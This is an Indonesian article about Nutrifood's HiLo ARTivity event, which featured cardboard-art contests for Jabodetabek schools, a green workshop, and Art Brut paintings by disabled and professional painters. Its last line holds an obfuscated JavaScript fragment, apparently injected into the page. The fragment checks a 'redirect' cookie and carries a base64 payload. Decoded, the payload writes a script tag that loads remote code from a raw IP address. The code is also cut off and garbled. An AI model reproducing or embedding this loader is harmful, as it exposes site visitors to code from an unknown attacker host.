Nutrifood Indonesia, melalui salah satu produk unggulannya yaitu HiLo, mengajak masyarakat untuk lebih peduli terhadap lingkungan dengan memanfaatkan barang bekas menjadi sebuah karya yang bernilai dengan menggelar rangkaian aktivasi bertajuk “HiLo ARTivity”. Bertempat di Mal Kota Kasablanka, Jakarta, pada Minggu (9/3), puncak HiLo ARTivity pun digelar dengan berbagai pertunjukan, seperti pameran kreasi kardus bekas HiLo, Green Workshop—pembuatan tas belanja dari baju bekas sebagai pengganti kantong plastik—, Art Brut oleh Anfield dan Pak Awi, Stand Up Comedy dari SUCI 4 Kompas TV, serta hiburan lainnya.
Seni Lukis Art Brut oleh pelukis Anfield Wibowo (9) dalam aktivasi Nutrifood lewat brand HiLo, HiLo ARTivity.
Susana, Kepala Divisi Marketing Nutrifood mengatakan, ”Sejalan dengan komitmen HiLo untuk selalu menginspirasi gaya hidup hijau, melalui HiLo ARTivity, kami ingin mengajak para konsumen, khususnya kaum remaja, untuk peduli lingkungan dan memberikan pemahaman bahwa gaya hidup hijau dapat dilakukan dengan cara yang menyenangkan, seperti yang dilakukan dalam program ini. Sehingga, kami berharap para remaja tidak hanya mendapatkan manfaat kesehatan dengan mengonsumsi HiLo Teen, namun juga menjadi generasi yang lebih peduli lingkungan dan kreatif.”
Rangkaian acara HiLo ARTivity sudah terselenggara sejak bulan September 2013 lalu ini melibatkan 80 sekolah SMP dan SMA se-Jabodetabek, dengan menggelar perlombaan pembuatan karya seni menggunakan kardus bekas susu HiLo Teen sehingga memiliki nilai guna. Kompetisi ini dibagi ke dalam dua kategori, yaitu kategori SMP dan kategori SMA. Selain memperebutkan gelar Juara 1 hingga Juara Harapan 2, kompetisi ini turut memberikan apresiasi kepada sekolah yang berhasil mengumpulkan kardus bekas HiLo Teen terbanyak dan juga kompetisi foto hasil karya via social media. Adapun total hadiah yang diperebutkan dalam kompetisi ini mencapai Rp 40 juta.
Dalam acara puncak HiLo ARTivity, diperkenalkan juga sebuah pertunjukan bertajuk ArtBrut sebagai suatu karya seni yang dihasilkan oleh para difabilitas. Tema karya seni yang dipamerkan adalah "Lukisan 2in1 Kolaborasi Art Brut : Reduksi Limbah Kemasan Hilo", yang merupakan hasil kolaborasi dari pelukis difabel dan pelukis profesional dengan memanfaatkan satu lembar media untuk dilukis secara bolak-balik. Ada empat pelukis yang terlibat dalam penciptaan karya luar biasa tersebut, yakni dua orang pelukis dengan difabilitas mental, tuna rungu, dan tuna wicara—Anfield Wibowo (9) dan Dwi Putro (50)—, serta dua orang pelukis profesional yaitu Joko Kisworo (Koordinator Kedai Art Brut Indonesia) dan Yos Soesilo (pembimbing Anfield, pengajar seni rupa untuk sanggar anak-anak).
Teguh Hermawan, Marketing Promotion Associate Manager Nutrifood menambahkan, “Acara ini baru diadakan pertama kali dan prosesnya sudah dari akhir tahun lalu. Ke depannya kami juga berharap bisa mengadakannya lagi di semester kedua tahun ini dengan target yang sama yaitu anak SMP dan SMA. Melalui acara ini juga menjadi sarana edukasi untuk anak-anak dalam kepedulian lingkungan dan berkreasi dengan barang bekas.” function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)